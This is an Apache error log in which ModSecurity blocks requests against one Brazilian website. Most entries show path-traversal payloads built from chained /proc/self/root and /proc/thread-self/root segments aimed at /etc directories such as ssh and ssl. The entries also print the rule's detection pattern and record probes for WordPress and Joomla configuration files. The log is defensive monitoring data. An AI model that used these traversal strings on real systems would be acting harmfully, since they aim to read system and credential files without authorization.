[Tue Mar 17 10:11:27.434996 2026] [:error] [pid 2325:tid 140411733534464] [client 74.7.243.203:51896] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablS_-82sZHvlq4xgHrG4AAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:11:28.805614 2026] [:error] [pid 11293:tid 140411590858496] [client 74.7.243.203:51910] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTANCmCSWTlPouqorP6AAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:11:33.202085 2026] [:error] [pid 2325:tid 140411548894976] [client 74.7.243.203:51922] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTBe82sZHvlq4xgHrG8AAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:11:45.234687 2026] [access_compat:error] [pid 18709:tid 140411590858496] [client 185.177.72.38:44898] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-load.php
[Tue Mar 17 10:11:45.505319 2026] [:error] [pid 2473:tid 140411666392832] [client 74.7.241.46:52012] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTEaBJNF7axNlVR0UA5QAAAAk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:11:46.923284 2026] [access_compat:error] [pid 18604:tid 140411741927168] [client 185.177.72.38:44952] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/configuration.php
[Tue Mar 17 10:11:59.231051 2026] [:error] [pid 18604:tid 140411540502272] [client 74.7.243.203:35582] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTH0Bd0UqwxWindINsHgAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:12:17.842534 2026] [:error] [pid 18380:tid 140411674785536] [client 74.7.243.203:59982] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTMa4xEDsg_V3ESNY3oAAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:12:35.523392 2026] [:error] [pid 1731:tid 140411540502272] [client 74.7.243.203:35334] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTQwb2qCuy5irgBMjNDgAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:12:36.836659 2026] [:error] [pid 18709:tid 140411540502272] [client 74.7.243.203:41962] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTRDarLhPAjZGI1b2yHAAAA5g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:12:42.459215 2026] [:error] [pid 18709:tid 140411733534464] [client 74.7.243.203:41970] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTSjarLhPAjZGI1b2yIgAAA4E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:12:43.804067 2026] [:error] [pid 18380:tid 140411590858496] [client 74.7.243.203:39948] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTS64xEDsg_V3ESNY3owAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:12:44.992411 2026] [:error] [pid 1016:tid 140411557287680] [client 74.7.243.203:39952] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTTJqmL8PQht4WJFlMcQAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:12:46.358961 2026] [:error] [pid 18604:tid 140411540502272] [client 74.7.243.203:39968] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTTkBd0UqwxWindINsKQAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:12:47.567105 2026] [:error] [pid 1731:tid 140411632822016] [client 74.7.243.203:39978] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTTwb2qCuy5irgBMjNEAAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:12:48.842687 2026] [:error] [pid 18709:tid 140411548894976] [client 74.7.243.203:39992] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTUDarLhPAjZGI1b2yJAAAA5c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:12:50.111615 2026] [:error] [pid 1731:tid 140411691570944] [client 74.7.243.203:40000] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTUgb2qCuy5irgBMjNEQAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:12:51.479486 2026] [:error] [pid 7437:tid 140411666392832] [client 74.7.243.203:51764] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTUweiSKl8TjouI-YGbAAAA8k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:12:52.800693 2026] [:error] [pid 2325:tid 140411590858496] [client 74.7.243.203:51772] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTVO82sZHvlq4xgHrHOwAAApI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:12:54.195774 2026] [:error] [pid 2473:tid 140411574073088] [client 74.7.243.203:51784] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTVqBJNF7axNlVR0UA_QAAABQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:12:55.552580 2026] [:error] [pid 2473:tid 140411699963648] [client 74.7.243.203:51794] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTV6BJNF7axNlVR0UA_gAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:12:56.797523 2026] [:error] [pid 1016:tid 140411540502272] [client 74.7.243.203:51800] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTWJqmL8PQht4WJFlMdQAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:12:58.222757 2026] [:error] [pid 1731:tid 140411741927168] [client 74.7.243.203:51802] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTWgb2qCuy5irgBMjNEgAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
